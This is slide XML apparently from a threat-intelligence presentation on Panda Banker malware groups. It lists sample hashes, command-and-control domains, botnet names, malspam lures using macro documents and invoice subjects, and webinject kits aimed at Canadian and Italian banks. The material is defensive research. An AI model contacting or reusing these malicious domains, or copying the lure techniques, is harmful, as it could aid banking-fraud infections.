              <a:t>31f8346b01d9e3c307280bf900de4e91a57d579d5327f75fd697431bcdd20dd4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: hydroyeo.com, cabbyelias.com, untosalol.com, shaveaweto.com, riottorus.com, meatodel.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“First Contact”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF5EED49-7878-CB4A-8F4E-4E0219A13C96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="28433" y="1143000"/>
            <a:ext cx="12192000" cy="1344632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2350721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b="1" dirty="0"/>
              <a:t>Distribution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malspam (April 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Word doc with macros hosted on Dropbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoofing a shipping company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Smoke Loader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: uhyzw6aqrc2zzu.win, 8mqytvupwfdh.bid, hdbhxq9swamy7.bid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Panda Banker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: l6a9v8s6.top, l9l6m1w6.top, x8a9i1s7.top</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rubella Macro Builder” (April 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: https://www.flashpoint-intel.com/blog/rubella-macro-builder/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“First Contact”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18517A9D-AB7C-BD49-BCC4-FDEDD4722B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795352" y="1376515"/>
            <a:ext cx="5787048" cy="3556000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2204061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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Targeting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Canada (March 2017)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1cb29891cd23b232c611ec24cf0f7a4c73fe419ff2be637beeb07360d3d402c5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2: plk4kd.xyz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~39</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“tables” kit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2: slphstvz.biz </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="238125" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Canada (December 2017)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>f99839235cd4d2c731bd66a75a3d49a57a45c5aa2e7637802284f16579fddd6a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2: frumdingo.top</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinject</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~39</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“tables” and “_txt.insert” kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2: plakdm.xyz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“First Contact”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4206526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First Contact </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D1E2C58-1C1A-7E40-8E92-D42C7F69A3FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="8045450" cy="4780888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AFB6CD2-6C43-F247-AFAF-23F146BDDA20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="6019800"/>
            <a:ext cx="9007594" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SHA256: db790cbe0beb2a9c2749cb914fbdec8bdc7aa2ef3c9ca6c721e0c0fede715fb2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1863731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463" y="2286000"/>
            <a:ext cx="10972800" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Samples:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ~700</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oldest: 335c0e4430a08956f796611b3ebf273117e784ee1d728d7b8fcb9997c98735cc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: 569311CDA810.faith, E3113EAF8798.bid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Newest: 58af96fb4c4f551fc9b8eb4890eab0144221ca976286f928d5bed696945f705e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: F2D5CAB27447.tk, F2D5CAB27498.ml, F2D5CAB27410.ga, F2D5CAB27498.cf, 0406453a7047.tk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> August 2017 – September 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Versions:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.5.0 – 2.6.10 (missing 2 versions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Botnets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>armata, onore, markit, mark, markusnew, billit, bill, mrtwister</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Italian Job”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A095415-F897-BD43-9D80-0675B560F0CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1143000"/>
            <a:ext cx="12192000" cy="1250706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33696489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b="1" dirty="0"/>
              <a:t>Distribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TA544</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malspam (August 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attached Word or Excel doc with macros </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subjects containing “Fattura” (translated: Invoice)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Panda Banker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>01464f1b285cd09b899c87c195d6b7d04b4a99c87ea16b43d11ea18cd2252eca</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: C5815F7F4427.bid, C5815F7F4418.win</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nymaim, Ursnif, Chthonic, Zloader, and URLZone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Italian Job”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4299477A-F181-4C43-BBDC-D1200BFD53BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="1219200"/>
            <a:ext cx="4785216" cy="4953000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59740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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Targeting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Italy (August 2017)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>335c0e4430a08956f796611b3ebf273117e784ee1d728d7b8fcb9997c98735cc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: 569311CDA810.faith, E3113EAF8798.bid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“id=“ and “adm=“ kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: westrostres.bid, sslstats.info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Italy and some Bitcoin (March 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8471a89cee977822f9826cabd122d63b7b8a2bd0a5239e22c634ac9eb951f47d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2: 0a109ec2ab47.com, fa208cd45c47.com, 3f5d37ec8547.com, f582e064be47.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~106</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“adm=“, “e.php?v=“, and “data-s %SOCKS%” kits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: sslstats.info, gemendoloma.top, seccunet.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="465138" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Italian Job”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9903044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pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group (“Italian Job”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA8BEC81-FA49-0148-8EC9-F6EA6F8929DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2847660"/>
            <a:ext cx="8468985" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Source: https://reaqta.com/2018/09/global-malware-campaign-using-zeus-panda/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E458C30-F108-4849-9BF2-274C602694C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1376515"/>
            <a:ext cx="12192000" cy="1471145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14858001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463" y="2286000"/>
            <a:ext cx="10972800" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Samples:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ~160</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oldest: 8db8f6266f6ad9546b2b5386a835baa0cbf5ea5f699f2eb6285ddf401b76ccb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: hillaryzell.xyz, buscamapa1.top</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Newest: 85d8829d7795af046e238d9981592f96ad49dcb2ccb9e5c6bb938bc04b1e8552</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: uiaoduiiej.chimkent.su, miliocife.aktyubinsk.su </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activity:</a:t>
            </a:r>
            <a:r>
